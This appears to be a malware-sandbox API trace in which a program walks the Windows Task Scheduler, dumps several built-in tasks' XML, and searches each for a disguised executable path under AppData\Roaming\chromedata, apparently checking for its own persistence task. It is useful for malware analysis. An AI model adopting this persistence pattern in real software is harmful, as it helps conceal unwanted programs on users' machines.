	[0073.652] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x28, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.652] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec0) returned 0x0
	[0073.652] IRegisteredTaskCollection:get_Count (in: This=0x55fec0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.652] IRegisteredTaskCollection:get_Item (in: This=0x55fec0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff98) returned 0x0
	[0073.653] IRegisteredTask:get_Name (in: This=0x55ff98, pName=0x128e3c | out: pName=0x128e3c*="ResolutionHost") returned 0x0
	[0073.653] IRegisteredTask:get_Xml (in: This=0x55ff98, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\dps.dll,-600)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\dps.dll,-601)</Source>\r\n    <URI>Microsoft\\Windows\\WDI\\ResolutionHost</URI>\r\n    <Description>$(@%systemroot%\\system32\\dps.dll,-602)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <Priority>10</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{900be39d-6be8-461a-bc4d-b0fa71f5ecb1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.653] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\dps.dll,-600)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\dps.dll,-601)</Source>\r\n    <URI>Microsoft\\Windows\\WDI\\ResolutionHost</URI>\r\n    <Description>$(@%systemroot%\\system32\\dps.dll,-602)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <Priority>10</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{900be39d-6be8-461a-bc4d-b0fa71f5ecb1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.653] IUnknown:Release (This=0x55ff98) returned 0x0
	[0073.653] IUnknown:Release (This=0x55fec0) returned 0x0
	[0073.653] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec0) returned 0x0
	[0073.654] ITaskFolderCollection:get_Count (in: This=0x55fec0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.654] IUnknown:Release (This=0x55fec0) returned 0x0
	[0073.654] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.654] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x29, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.654] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe88) returned 0x0
	[0073.654] IRegisteredTaskCollection:get_Count (in: This=0x55fe88, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.654] IRegisteredTaskCollection:get_Item (in: This=0x55fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff90) returned 0x0
	[0073.654] IRegisteredTask:get_Name (in: This=0x55ff90, pName=0x128e3c | out: pName=0x128e3c*="QueueReporting") returned 0x0
	[0073.654] IRegisteredTask:get_Xml (in: This=0x55ff90, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\wer.dll,-292)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\wer.dll,-293)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\wer.dll,-294)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Delay>PT13M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Priority>5</Priority>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\wermgr.exe</Command>\r\n      <Arguments>-queuereporting</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.655] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\wer.dll,-292)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\wer.dll,-293)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\wer.dll,-294)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Delay>PT13M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Priority>5</Priority>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\wermgr.exe</Command>\r\n      <Arguments>-queuereporting</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.655] IUnknown:Release (This=0x55ff90) returned 0x0
	[0073.655] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.655] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe88) returned 0x0
	[0073.655] ITaskFolderCollection:get_Count (in: This=0x55fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.655] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.655] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.655] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2a, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.655] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fef0) returned 0x0
	[0073.656] IRegisteredTaskCollection:get_Count (in: This=0x55fef0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.656] IRegisteredTaskCollection:get_Item (in: This=0x55fef0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c2060) returned 0x0
	[0073.656] IRegisteredTask:get_Name (in: This=0x22c2060, pName=0x128e3c | out: pName=0x128e3c*="BfeOnServiceStartTypeChange") returned 0x0
	[0073.656] IRegisteredTask:get_Xml (in: This=0x22c2060, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange</URI>\r\n    <Author>$(@%SystemRoot%\\system32\\bfe.dll,-2001)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\bfe.dll,-2002)</Description>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Triggers>\r\n    <EventTrigger id=\"06688f40-e0af-4efa-8a89-2617bd993d71\">\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>bfe.dll,BfeOnServiceStartTypeChange</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.656] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange</URI>\r\n    <Author>$(@%SystemRoot%\\system32\\bfe.dll,-2001)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\bfe.dll,-2002)</Description>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Triggers>\r\n    <EventTrigger id=\"06688f40-e0af-4efa-8a89-2617bd993d71\">\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>bfe.dll,BfeOnServiceStartTypeChange</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.657] IUnknown:Release (This=0x22c2060) returned 0x0
	[0073.657] IUnknown:Release (This=0x55fef0) returned 0x0
	[0073.657] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fef0) returned 0x0
	[0073.657] ITaskFolderCollection:get_Count (in: This=0x55fef0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.657] IUnknown:Release (This=0x55fef0) returned 0x0
	[0073.657] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.657] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2b, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.657] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe88) returned 0x0
	[0073.657] IRegisteredTaskCollection:get_Count (in: This=0x55fe88, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.658] IRegisteredTaskCollection:get_Item (in: This=0x55fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff90) returned 0x0
	[0073.658] IRegisteredTask:get_Name (in: This=0x55ff90, pName=0x128e3c | out: pName=0x128e3c*="UpdateLibrary") returned 0x0
	[0073.658] IRegisteredTask:get_Xml (in: This=0x55ff90, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)</SecurityDescriptor>\r\n    <Author>$(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)</Author>\r\n    <Description>$(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n              &lt;Query\r\n                  Id=\"0\"\r\n                  Path=\"System\"\r\n                  &gt;\r\n                &lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]&lt;/Select&gt;\r\n              &lt;/Query&gt;\r\n            &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AuthenticatedUsers\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AuthenticatedUsers\">\r\n    <Exec>\r\n      <Command>\"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"</Command>\r\n    </Exec>\r\n  </Actions>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0073.658] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)</SecurityDescriptor>\r\n    <Author>$(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)</Author>\r\n    <Description>$(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n              &lt;Query\r\n                  Id=\"0\"\r\n                  Path=\"System\"\r\n                  &gt;\r\n                &lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]&lt;/Select&gt;\r\n              &lt;/Query&gt;\r\n            &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AuthenticatedUsers\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AuthenticatedUsers\">\r\n    <Exec>\r\n      <Command>\"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"</Command>\r\n    </Exec>\r\n  </Actions>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.658] IUnknown:Release (This=0x55ff90) returned 0x0
	[0073.658] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.658] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe88) returned 0x0
	[0073.659] ITaskFolderCollection:get_Count (in: This=0x55fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.659] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.659] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.659] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2c, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.659] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe88) returned 0x0
	[0073.659] IRegisteredTaskCollection:get_Count (in: This=0x55fe88, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.659] IRegisteredTaskCollection:get_Item (in: This=0x55fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff80) returned 0x0
	[0073.659] IRegisteredTask:get_Name (in: This=0x55ff80, pName=0x128e3c | out: pName=0x128e3c*="ConfigNotification") returned 0x0
	[0073.659] IRegisteredTask:get_Xml (in: This=0x55ff80, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>Microsoft Corporation</Source>\r\n    <Author>Microsoft Corporation</Author>\r\n    <Description>This scheduled task notifies the user that Windows Backup has not been configured.</Description>\r\n    <URI>Microsoft\\Windows\\WindowsBackup\\ConfigNotification</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2010-11-27T10:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%systemroot%\\System32\\sdclt.exe</Command>\r\n      <Arguments>/CONFIGNOTIFICATION</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.660] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>Microsoft Corporation</Source>\r\n    <Author>Microsoft Corporation</Author>\r\n    <Description>This scheduled task notifies the user that Windows Backup has not been configured.</Description>\r\n    <URI>Microsoft\\Windows\\WindowsBackup\\ConfigNotification</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2010-11-27T10:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%systemroot%\\System32\\sdclt.exe</Command>\r\n      <Arguments>/CONFIGNOTIFICATION</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.660] IUnknown:Release (This=0x55ff80) returned 0x0
	[0073.660] IUnknown:Release (This=0x55fe88) returned 0x0
